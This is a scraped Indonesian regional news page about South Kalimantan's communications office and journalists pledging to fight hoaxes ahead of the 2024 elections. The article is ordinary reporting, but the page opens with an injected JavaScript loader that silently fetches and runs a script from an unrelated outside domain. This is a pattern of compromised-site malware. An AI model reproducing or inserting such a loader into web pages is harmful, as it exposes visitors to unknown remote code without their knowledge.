(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Media Massa Hadirkan Interaksi Ruang Digital Sehat, Dukung Pemilu 2024 Anti Hoax


KANALKALIMANTAN.COM, BANJARBARU – Menyambut pesta demokrasi tahun 2024, Pemerintah Provinsi Kalimantan Selatan (Kalsel) menyiapkan strategi mewujudkan ruang digital yang sehat.

Terlebih menjelang masa kampanye Pemilihan Umum (Pemilu) dan Pemilihan Kepala Daerah (Pilkada) 2024 yang akan dimulai akhir tahun ini.

Kepala Dinas Komunikasi dan Informatika (Diskominfo) Kalsel, Muhammad Muslim mengatakan, saat ini saja sudah tercatat lebih dari 300 berita hoax yang beredar di media sosial.

Baca juga: Mahasiswa Bergerak Cari Gubernur Sahbirin, Sebut Karhutla Bencana Rutin Tahunan Kalsel

Dirinya menyimpulkan tantangan terberat yang akan dihadapi menjelang hingga sampai pada akhir masa pesta demokrasi adalah berita bohong atau hoax.

“Dimulai dari munculnya kebohongan-kebohongan informasi kesehatan, kebijakan pemerintah, hingga kepada informasi yang berkaitan dengan politik itu sendiri,” ucap Kadiskominfo Kalsel, Kamis (12/10/2023) siang.

Tentu sambungnya, tugas dari Diskominfo itu sendiri ialah terus mengawal tiga hal, yakni mengawal informasi dan komunikasi, keamanann Informasi dan statistik.

Baca juga: Mantan Bupati HST Divonis 6 Tahun Penjara Kali Kedua, Lawan Putusan dengan Banding

Mengawali tugas itu pula, Diskominfo Kalsel menggandeng 60 orang jurnalis dari berbagai media massa di Kalsel dalam gelaran acara Media Event bertajuk ‘Kawal Ruang Digital, Kamis (12/10/2023).

Diskominfo Kalsel turut menggandeng Ketua PWI Kalsel, anggota Bawaslu Kalsel, dan anggota KPU Kalsel, untuk menandatangani secara simbolis petisi online yang isinya mengajak seluruh komponen mengawal ruang digital guna memberitakan konten sehat dan positif tentang Pemilu dan Pilkada.

“Dengan demikian kita berharap untuk dapat memastika pemilu pilkada dapat berjalan dengan kondusif dan baik,” harap dia.

Baca juga: Wakil Ketua I DPRD Kapuas Apresiasi Simulasi Sispamkota Kesiapan Pengamanan Pemilu

Dengan pendatangan petisi ini pula dia berharap menjadi upaya konkrit untuk masyarakat agar betul-betul dapat merasakan pesta demokrasi yang tidak merusak tetapi memberikan kegembiraan.

Ketua PWI Kalsel Zaenal Helmie berkesempatan menjadi narasumber atau pembicara dalam Media Event mengatakan, agar masyarakat dapat membedakan berita-berita yang benar menyajikan fakta.

“Yang pasti jika mencari fakta kita harus terlebih dahulu melihat jenis media. Seperti media massa mainstream seperti televisi, koran dan media massa online di Kalsel sudah pasti terverifikasi,” ucap Zaenal Helmie di hadapan puluhan jurnalis.

Baca juga: Perkelahian di Banjarmasin Tewaskan Kakak Adik, Dua Pelaku Ayah dan Anak

Untuk itu bersama dengan seluruh lapisan media massa yang ada di Kalsel, dia berkomitmen mengawal ruang ruang digital menjadi ruang yang penuh edukasi.

“Dan tentunya menjadi ruang yang memfasilitasi seluruh masyarakat agar informasi yang diterima benar adanya dan tidak termakan hoax,” tutupnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

28 menit ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

46 menit ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

2 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

2 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

3 jam ago

Perda Tentang Perusda, DPRD Batara Kunker ke Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Barito Utara (Batara), Kalimantan Tengah, Senin… Read More

5 jam ago

This website uses cookies.